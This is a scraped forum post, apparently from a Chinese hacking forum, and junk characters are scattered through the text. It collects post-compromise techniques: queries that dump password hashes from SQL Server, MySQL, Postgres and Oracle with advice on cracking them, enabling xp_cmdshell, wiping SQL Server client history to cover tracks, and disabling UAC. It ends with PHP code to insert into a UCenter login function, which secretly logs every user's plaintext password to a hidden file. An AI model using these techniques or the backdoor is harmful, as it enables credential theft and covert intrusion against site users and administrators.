1 n$ c) e4 ^1 }- K0 }$ z0 q, r2FD54D6119FFF04129A1D72E7C3194F7284A7F3A3 Z$ W$ A x7 }
+ K3 r) N7 o9 q5 d& @- @( o8 c0×0100- constant header
7 d3 |6 V+ {# Q) {34767D5C- salt& y: T& I9 `+ R0 v( ~$ N, n* `
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash! k8 }. h5 A' ^2 }! D
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
5 V, v; Y1 U; x4 ]! n! Y% W8 U; ~crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
" U8 B9 Q4 e4 L% a+ y) LSQL server 2005:-
( E" z4 P+ @- r' D# PSELECT password_hash FROM sys.sql_logins where name='sa'! b2 }* H8 [: o9 N% N/ X
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
- ~# j; @6 e, T) K8 ~7 \8 g) i( B0×0100- constant header
+ M: M+ {4 r" [ ], V993BF231-salt: q: D% R) G9 g$ g- P/ A7 r
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
0 @- I: X% E$ | Z3 c4 Zcrack case sensitive hash in cain, try brute force and dictionary based attacks.' y6 j4 v* j4 J
0 X; j) n! q6 @% Lupdate:- following bernardo’s comments:-/ k$ n4 W1 z1 F6 @/ D' O# t$ \0 @
use function fn_varbintohexstr() to cast password in a hex string.
2 n% I' }! p: g7 @* y0 B; ie.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
- P: `+ h5 o3 e# m; k5 w% R- c
' v& W9 \" [( x$ s" b# gMYSQL:-* Q3 k9 v5 j7 N2 ^7 v6 a& O$ t
2 K5 i7 x7 ^) t2 s0 {( p( `
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.) e6 t) y2 f, ]
: ?% d. c) q+ ]; N
*mysql < 4.1
4 u& L* B) H3 l4 _* C& K4 v8 P2 S; o) b& N5 J& b# M
mysql> SELECT PASSWORD(‘mypass’);( d0 x3 K# E, |( Y* b
+——————–+
- {$ j( k9 ?1 n' Q% L. |- e| PASSWORD(‘mypass’) |
9 W6 S% L1 G8 b5 l+——————–+
- v9 g2 Y1 e+ W0 b3 T| 6f8c114b58f2ce9e |& K) K, G9 Y* k( i, o% U9 r4 V& v
+——————–+
9 I4 ~0 m, F b. }: M4 C
) @* w; y, K# K$ R8 c$ G: w*mysql >=4.1
" x( e: K7 `& t0 ]- ]7 ?
l N1 p6 O; ?mysql> SELECT PASSWORD(‘mypass’);3 E0 T, J) n* M! W: q2 a
+——————————————-+8 L& D+ B* _+ @) i3 P0 |6 h
| PASSWORD(‘mypass’) |9 D* u# N7 E; u; b* Z; f; W4 x
+——————————————-+
( Z. m; c. X1 O' [2 }0 a( q0 N( w| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |1 l$ J- N9 B& |
+——————————————-+
1 r0 n" L/ H, N8 b' @6 s5 a _( }
Select user, password from mysql.user( u2 L5 `8 k" b7 h* r9 p/ @% @
The hashes can be cracked in ‘cain and abel’
/ t, j' s+ _( y5 A9 _( l8 y6 X) |, {, [8 R% y9 [2 g
Postgres:-/ Q% n' T4 c0 ^
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
! T( ]; o/ h% H8 ?( e4 z9 F3 [select usename, passwd from pg_shadow;
% k) c3 O1 e$ E( Busename | passwd' M+ d0 S1 \/ [( F8 r
——————+————————————-. u+ W2 g) g) K0 s
testuser | md5fabb6d7172aadfda4753bf0507ed4396
% x. C4 V9 f2 N6 ~! i* \- ^+ E6 a( euse mdcrack to crack these hashes:-3 G, I4 g/ g4 b' K
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396 ~$ s3 Q; W: x4 x+ j5 j$ ?( U" n
# i# ]+ @3 a3 V9 d- m" t, mOracle:-8 i! r0 Z# d( S$ b% _
select name, password, spare4 from sys.user$
: U8 ]6 R) u1 Yhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g+ R7 v0 B1 O+ u# e
More on Oracle later, i am a bit bored….
0 x( g( K e6 g* e& J1 D! F- l
" v7 g' I! v: H: c
1 m" d# t) `/ Q9 {$ F在sql server2005/2008中开启xp_cmdshell$ b& d) R, q' [7 t1 x
-- To allow advanced options to be changed. n( `/ s( H6 x g7 o$ Z
EXEC sp_configure 'show advanced options', 1
5 G" H- b0 ?8 h% A9 ~8 c* ZGO% e: ^7 g: M% D
-- To update the currently configured value for advanced options.
) Y S, x; u2 ~RECONFIGURE t0 y% K" B) c0 U
GO
h2 p& |; G- r6 e-- To enable the feature.
* S0 y1 @5 [; Z' OEXEC sp_configure 'xp_cmdshell', 15 B3 t, L( `0 X5 Z {' V4 }
GO
3 u- f1 @* }/ I6 |' A-- To update the currently configured value for this feature.+ a& S d1 k7 B* F* @' l7 k
RECONFIGURE
( K- k7 _, i- q* S6 f: XGO: ?: H9 O5 o1 c$ F; W6 `+ C
SQL 2008 server日志清除,在清楚前一定要备份。$ ?5 Q6 Z# M# j
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:7 _7 O% K5 O' V% S; r8 P5 c
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin( N) d6 _5 V$ }6 I# b4 d1 p) R
3 g6 Z, x+ m! m. M
对于SQL Server 2008以前的版本:
; N/ H# c3 k, W, U3 b; TSQL Server 2005:+ d; d3 i! J6 K( ^
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
: P: m0 E% J1 I/ Y2 B" a2 K& n9 z& kSQL Server 2000:
5 ^/ R+ n0 f* C7 k! |9 F7 @清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
* |5 h2 c' S% W+ T$ g& \4 Z! d3 w
( J( [2 [* E/ `本帖最后由 simeon 于 2013-1-3 09:51 编辑
" g) Q8 T# g% f) _. ?% O6 R* h" D
2 h: x/ i/ }4 X: u1 e( fwindows 2008 文件权限修改! z# T& X6 J. p. z0 X: F
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
6 P. d! M0 K7 n/ V2 h% s2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
1 H' n; N ?, a5 C9 M; r一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
& b M! o% _% O* z+ [) R; G! g: s( G, m* }7 c1 |1 }
Windows Registry Editor Version 5.00
+ u0 a% d; [$ P2 C[HKEY_CLASSES_ROOT\*\shell\runas]9 t' s/ R V7 O, a
@="管理员取得所有权"
. T& f3 r' ^1 y+ i7 D"NoWorkingDirectory"=""( z$ {7 c& X# U$ b: g9 H5 t0 ^
[HKEY_CLASSES_ROOT\*\shell\runas\command]
9 w& n- n9 b; Q8 m( y@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
& U. u$ R1 Q+ H2 u/ ^"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
/ `: y2 k2 V% y$ p[HKEY_CLASSES_ROOT\exefile\shell\runas2]6 @7 d* Z" X1 g/ N
@="管理员取得所有权"' M1 h4 k6 j9 h& j d( |
"NoWorkingDirectory"=""! k6 j+ |) g% H3 c6 h0 `3 _
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
6 L+ k2 V2 n. T$ f* c9 l@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F". ~: i! d: b. I
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"- X3 u5 i) M* I9 p( w6 C% B
% e2 \8 f1 Q. V8 ^
[HKEY_CLASSES_ROOT\Directory\shell\runas]+ y/ ?% r: A' L+ m x
@="管理员取得所有权"
# m9 M' @$ @; ~% E+ W"NoWorkingDirectory"="" O$ X# o1 F. |8 ] a0 Q) r; t
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]( L/ v: }, ^+ O1 X+ I$ }1 f
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t". x) v6 ?# d) @$ n+ l: G9 F
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"! S3 f' C; Y' e+ X S9 ^- s& L z
. N% M3 f9 C, g7 q
2 B& W O8 s3 Hwin7右键“管理员取得所有权”.reg导入3 _8 v2 S+ R. \2 N- l, H
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
% a3 r9 J) V$ X" u, a& Z* v1、C:\Windows这个路径的“notepad.exe”不需要替换
: K. E }# X) Q2 t. s2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
) O$ u0 T ~. O# z9 @3、四个“notepad.exe.mui”不要管 L1 |0 N( ^+ w: M' @
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和: U8 p2 H! C1 g9 e& O, G
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
6 I1 b* O3 t* m* s; H: o5 f" O替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
! Y- p/ c# z1 g2 z替换完之后回到桌面,新建一个txt文档打开看看是不是变了。1 C# M8 q0 j. v
windows 2008中关闭安全策略:
* R& V2 j# Q) N; C8 f8 Xreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\, k6 A6 b' J* Z0 {修改uc_client目录下的client.php 在
. y4 H; ^6 G! c# K9 [5 ]function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
9 g: ]7 z; o1 u! L1 i5 R( y下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
- S! A6 T) t- v6 l你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw( ~8 i# Y$ F' v+ ^# m3 f3 l
if(getenv('HTTP_CLIENT_IP')) {9 V, @1 w# M. a1 `) K! x
$onlineip = getenv('HTTP_CLIENT_IP');6 q% B: Q. ^' s# U6 p/ ` I
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {% Z9 S% d9 `- Z: x* o% A: e d
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
; f* E8 D+ @- A. l0 r) H} elseif(getenv('REMOTE_ADDR')) {
& m4 d: E+ R$ Z7 G$onlineip = getenv('REMOTE_ADDR');* G6 }$ q2 Q9 e& s |
} else {
0 t- f: r, s1 w$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
( L6 l0 n4 |% `}! \0 S+ _, e& g2 x' K! n1 V
$showtime=date("Y-m-d H:i:s");" |1 X/ n$ c0 T+ |0 x& c
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";0 |' ]1 h& a, r' m) x/ y% a! D0 {
$handle=fopen('./data/cache/csslog.php','a+');2 C4 E% K' l: Y; s
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对